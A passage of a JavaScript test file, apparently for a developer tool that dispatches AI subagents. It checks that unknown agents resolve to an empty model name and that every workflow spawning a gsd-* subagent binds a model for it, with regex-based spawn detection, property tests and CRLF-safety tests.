`validation gate must REJECT ${JSON.stringify(bad)} — it would otherwise be ` +
|
|
'interpolated into a shell command built from a capability manifest.',
|
|
);
|
|
}
|
|
});
|
|
|
|
test('#2684: an unknown agent type resolves to an empty model, so dispatch must omit', () => {
|
|
// Hermetic: a throwaway project whose config explicitly sets resolve_model_ids:"omit".
|
|
// ship.md dispatches `ref.agent` — an arbitrary capability-supplied agent name that need
|
|
// not be in MODEL_PROFILES. This pins that such a name resolves to the EMPTY string, so
|
|
// the consumer must omit `model=` rather than emit `model=""` (the #2517 404).
|
|
const dir = createTempProject('gsd-2684-');
|
|
try {
|
|
fs.writeFileSync(
|
|
path.join(dir, '.planning', 'config.json'),
|
|
JSON.stringify({ model_profile: 'balanced', resolve_model_ids: 'omit', runtime: 'claude' }),
|
|
);
|
|
const res = runGsdTools(['query', 'resolve-model', 'not-a-real-agent'], dir);
|
|
assert.ok(res.success, `resolve-model failed (exit ${res.exitCode}): ${res.error}`);
|
|
const parsed = JSON.parse(res.output);
|
|
assert.equal(parsed.unknown_agent, true, 'an agent absent from MODEL_PROFILES must be flagged');
|
|
assert.equal(
|
|
parsed.model,
|
|
'',
|
|
'an unknown agent under resolve_model_ids:"omit" must resolve to the EMPTY string — ' +
|
|
'the resolver is correct to refuse to invent a tier, which is precisely why the ' +
|
|
'ship.md dispatch has to omit model= instead of substituting (#2684 / #2517).',
|
|
);
|
|
} finally {
|
|
cleanup(dir);
|
|
}
|
|
});
|
|
|
|
// ---------------------------------------------------------------------------
|
|
// #3602 — every spawned gsd-* subagent gets a model resolution.
|
|
//
|
|
// ingest-docs.md and import.md spawned their agents with ZERO model bindings,
|
|
// so every spawn silently inherited the caller's model regardless of
|
|
// dynamic_routing/model_profile config. audit-fix.md and diagnose-issues.md
|
|
// had the same defect; the issue's per-file grep audit missed them because
|
|
// their spawns are dispatch-shaped, not file-level greppable. This guard
|
|
// re-derives the audit from the corpus so a fifth file cannot join silently.
|
|
//
|
|
// An agent type is covered when the workflow either (a) resolves it directly —
|
|
// a `resolve-model <agent>` call appears in the file — or (b) dispatches with
|
|
// a `model=…` reference that is bound by one of the #2684 sources (shell
|
|
// assignment, declared parse field, or a key of an init surface the file
|
|
// queries). Route (b) cannot see WHICH agent a `planner_model`-style field
|
|
// answers — that mapping is conventional, not textual — so it covers the
|
|
// file's spawns as a group; that is the same altitude the issue's own audit
|
|
// operated at, and it is what lets this guard adopt without touching the
|
|
// ~20 compliant init-route workflows.
|
|
//
|
|
// Documented residuals (isolated adversarial review, #3602 PR):
|
|
// - Group coverage means a file binding ONE agent's model could later gain a
|
|
// SECOND, unbound spawn and still pass. Direct per-agent resolution (route a)
|
|
// is what this PR shipped for every file it touched; a per-site guard would
|
|
// need delimited Agent-block parsing the corpus's prose spawns don't have.
|
|
// - The prose collector misses "Delegate to `gsd-x`", "Invoke the gsd-x agent",
|
|
// and mid-sentence "then spawn `gsd-x`" shapes; every live instance of those
|
|
// today is also collected via a dispatch shape in the same combined body.
|
|
// - readWorkflowCombined inlines only <wf>/steps/ fragments, so dispatches in
|
|
// e.g. discuss-phase/modes/*.md are invisible here (all currently compliant).
|
|
// ---------------------------------------------------------------------------
|
|
|
|
/** Init-surface resolver for synthetic bodies: no surfaces, so binding must come
|
|
* from the text sources (shell assignment / parse line) alone. */
|
|
const noInit = () => null;
|
|
|
|
/** gsd-* agent types this workflow spawns, by any spawn shape the corpus uses.
|
|
*
|
|
* The prose shape collects an instruction ("spawn `gsd-x` in parallel",
|
|
* "**Spawn gsd-user-profiler agent using Task tool:**") but not a description of
|
|
* what a NESTED workflow does — plan-review-convergence.md runs plan-phase inline
|
|
* and its "inline plan-phase can spawn gsd-planner / plan-phase spawn gsd-planner"
|
|
* mentions describe plan-phase's dispatches, whose bindings live in plan-phase.md.
|
|
* Discriminator: a descriptive continuation is always preceded by a lowercase word
|
|
* ("it can spawn", "phase spawn"); an instruction follows a comma, `**`, punctuation,
|
|
* or line start. Mid-sentence imperatives ("then spawn `gsd-x`") are a known
|
|
* under-collection — the dispatch shape remains the primary collector.
|
|
*/
|
|
function spawnedAgentTypes(content) {
|
|
const dispatchShaped = [...content.matchAll(/subagent_type[=:]\s*"?(gsd-[a-z0-9-]+)"?/g)].map((m) => m[1]);
|
|
const proseShaped = [
|
|
...content.matchAll(/(?<![a-z] )\bspawn(?:s|ing)?\s+`?(gsd-[a-z0-9-]+)/gi),
|
|
].map((m) => m[1]);
|
|
return [...new Set([...dispatchShaped, ...proseShaped])];
|
|
}
|
|
|
|
/** Names referenced as `model=…` at dispatch sites: `"{X}"`, bare `X`, quoted `"X"`. */
|
|
function modelRefNames(content) {
|
|
const braced = [...content.matchAll(/model="\{([A-Za-z0-9_]+)\}"/g)].map((m) => m[1]);
|
|
// Bare/unquoted form (execute-plan.md: `model=executor_model`). A leading quote
|
|
// deliberately does not match here, so `model="haiku"` is not treated as a
|
|
// binding reference — a literal tier is a value, not a resolution.
|
|
const bare = [...content.matchAll(/model=([A-Za-z_][A-Za-z0-9_]*)/g)].map((m) => m[1]);
|
|
return [...new Set([...braced, ...bare])];
|
|
}
|
|
|
|
/** Every name the #2684 machinery treats as a binding source, for one body. */
|
|
function boundModelNames(content, resolveInit = initPayloadKeys) {
|
|
const bound = new Set([...shellAssignedNames(content), ...declaredParseNames(content)]);
|
|
for (const surface of queriedInitSurfaces(content)) {
|
|
const keys = resolveInit(surface);
|
|
if (keys) for (const k of keys) bound.add(k);
|
|
}
|
|
return bound;
|
|
}
|
|
|
|
/** Uncovered spawns in one body: `gsd-x` agent types with no resolution behind them. */
|
|
function uncoveredSpawnedAgents(content, resolveInit = initPayloadKeys) {
|
|
const agents = spawnedAgentTypes(content);
|
|
if (agents.length === 0) return [];
|
|
const bound = boundModelNames(content, resolveInit);
|
|
// A file that binds any *_model name (shell assignment, parse line, or init payload
|
|
// key) carries model resolution even when its dispatch sites live in an inline child
|
|
// workflow — plan-review-convergence.md parses planner_model/checker_model and runs
|
|
// plan-phase inline; plan-phase.md owns the model= sites.
|
|
const fileCarriesModelResolution =
|
|
modelRefNames(content).some((n) => bound.has(n)) || [...bound].some((n) => /_model$/i.test(n));
|
|
return agents.filter((a) => {
|
|
const direct = new RegExp(`resolve-model\\s+["'\`]?${escapeRegex(a)}["'\`]?`).test(content);
|
|
return !(direct || fileCarriesModelResolution);
|
|
});
|
|
}
|
|
|
|
test('#3602: every workflow that spawns a gsd-* subagent resolves a model for it', () => {
|
|
const findings = [];
|
|
let spawningFiles = 0;
|
|
let coveredSpawns = 0;
|
|
|
|
for (const file of fs.readdirSync(WORKFLOWS).filter((f) => f.endsWith('.md'))) {
|
|
const content = readWorkflowCombined(path.join(WORKFLOWS, file));
|
|
const agents = spawnedAgentTypes(content);
|
|
if (agents.length === 0) continue;
|
|
spawningFiles += 1;
|
|
const uncovered = uncoveredSpawnedAgents(content);
|
|
coveredSpawns += agents.length - uncovered.length;
|
|
for (const a of uncovered) {
|
|
findings.push(
|
|
`${file}: spawns ${a} with no model resolution — neither a \`resolve-model ${a}\` ` +
|
|
`binding nor a bound model= reference (#3602). The spawn silently inherits the ` +
|
|
`caller's model, ignoring dynamic_routing/model_profile.`,
|
|
);
|
|
}
|
|
}
|
|
|
|
// Non-vacuity: a spawn-collector that silently stops matching must fail, not pass.
|
|
assert.ok(
|
|
spawningFiles >= 20,
|
|
`expected >=20 spawning workflows, derived ${spawningFiles} — the derivation itself ` +
|
|
'is broken, so this guard proves nothing.',
|
|
);
|
|
assert.ok(
|
|
coveredSpawns >= 30,
|
|
`expected >=30 covered spawns, derived ${coveredSpawns} — the derivation itself ` +
|
|
'is broken, so this guard proves nothing.',
|
|
);
|
|
assert.deepEqual(findings, [], `spawns with no model resolution:\n ${findings.join('\n ')}`);
|
|
});
|
|
|
|
test('#3602: prose mentions that are not spawns are not flagged', () => {
|
|
const body = [
|
|
'## Anti-Patterns',
|
|
'',
|
|
'- Use `gsd-plan-checker` and `gsd-planner` — never the pbr ones',
|
|
'- Valid types: gsd-debugger — investigates bugs',
|
|
'',
|
|
].join('\n');
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(body, noInit),
|
|
[],
|
|
'an anti-pattern mention and a type listing are not spawns — flagging them is a false positive',
|
|
);
|
|
|
|
// Counter-case: the same agent name preceded by a spawn verb IS collected.
|
|
const spawnProse = 'For each doc, spawn `gsd-doc-classifier` in parallel.\n';
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(spawnProse, noInit),
|
|
['gsd-doc-classifier'],
|
|
'a prose spawn with no binding behind it must be reported — that is the #3602 shape',
|
|
);
|
|
});
|
|
|
|
test('#3602: a literal model= value is not a binding', () => {
|
|
const literal = [
|
|
'Agent(',
|
|
' prompt="fix it",',
|
|
' subagent_type="gsd-executor",',
|
|
' model="haiku"',
|
|
')',
|
|
'',
|
|
].join('\n');
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(literal, noInit),
|
|
['gsd-executor'],
|
|
'model="haiku" hardcodes a tier — it is a value, not a resolution, and must not count as coverage',
|
|
);
|
|
|
|
const bound = [
|
|
'EXECUTOR_MODEL=$(gsd_run query resolve-model gsd-executor --raw)',
|
|
'Agent(',
|
|
' prompt="fix it",',
|
|
' subagent_type="gsd-executor",',
|
|
' model="{EXECUTOR_MODEL}"',
|
|
')',
|
|
'',
|
|
].join('\n');
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(bound, noInit),
|
|
[],
|
|
'a shell-assigned resolve-model binding referenced at the dispatch site is coverage',
|
|
);
|
|
|
|
const bareForm = 'Parse from init JSON: `executor_model`.\nAgent(subagent_type="gsd-executor", model=executor_model)\n';
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(bareForm, noInit),
|
|
[],
|
|
'the bare model=executor_model notation (execute-plan.md) counts when the name is parse-declared',
|
|
);
|
|
});
|
|
|
|
test('#3602: spawn-site extraction round-trips (property)', () => {
|
|
const name = fc.stringMatching(/^gsd-[a-z0-9]{1,18}$/);
|
|
fc.assert(
|
|
fc.property(fc.array(name, { minLength: 1, maxLength: 10 }), (names) => {
|
|
const distinct = [...new Set(names)];
|
|
const render = (n) =>
|
|
n === names[0]
|
|
? `spawn \`${n}\` in parallel` // prose shape
|
|
: `subagent_type: "${n}"`; // dispatch shape
|
|
const body = names.map(render).join('\n');
|
|
assert.deepEqual([...spawnedAgentTypes(body)].sort(), [...distinct].sort());
|
|
}),
|
|
{ numRuns: 200 },
|
|
);
|
|
});
|
|
|
|
test('#3602: spawn coverage detection is CRLF-safe', () => {
|
|
|
|
const unbound = [
|
|
'For each doc, spawn `gsd-doc-classifier` in parallel.',
|
|
'Agent(subagent_type="gsd-doc-synthesizer")',
|
|
'',
|
|
].join('\n');
|
|
const unboundLf = uncoveredSpawnedAgents(unbound, noInit);
|
|
assert.deepEqual(
|
|
[...unboundLf].sort(),
|
|
['gsd-doc-classifier', 'gsd-doc-synthesizer'],
|
|
'with no binding anywhere in the file, both spawn shapes are uncovered',
|
|
);
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(unbound.replace(/\n/g, '\r\n'), noInit),
|
|
unboundLf,
|
|
'CRLF input must yield the same verdicts as LF (recurring class: #1658/#1668/#2206/#2449/#2450)',
|
|
);
|
|
|
|
const bound = [
|
|
'CLASSIFIER_MODEL=$(gsd_run query resolve-model gsd-doc-classifier --raw)',
|
|
'Agent(subagent_type="gsd-doc-synthesizer", model="{CLASSIFIER_MODEL}")',
|
|
'',
|
|
].join('\n');
|
|
const boundLf = uncoveredSpawnedAgents(bound, noInit);
|
|
assert.deepEqual(boundLf, [], 'a file-level binding covers the file\'s spawns as a group');
|
|
assert.deepEqual(
|
|
uncoveredSpawnedAgents(bound.replace(/\n/g, '\r\n'), noInit),
|
|
boundLf,
|
|
'CRLF input must yield the same verdicts as LF',
|
|
);
|
|
});
|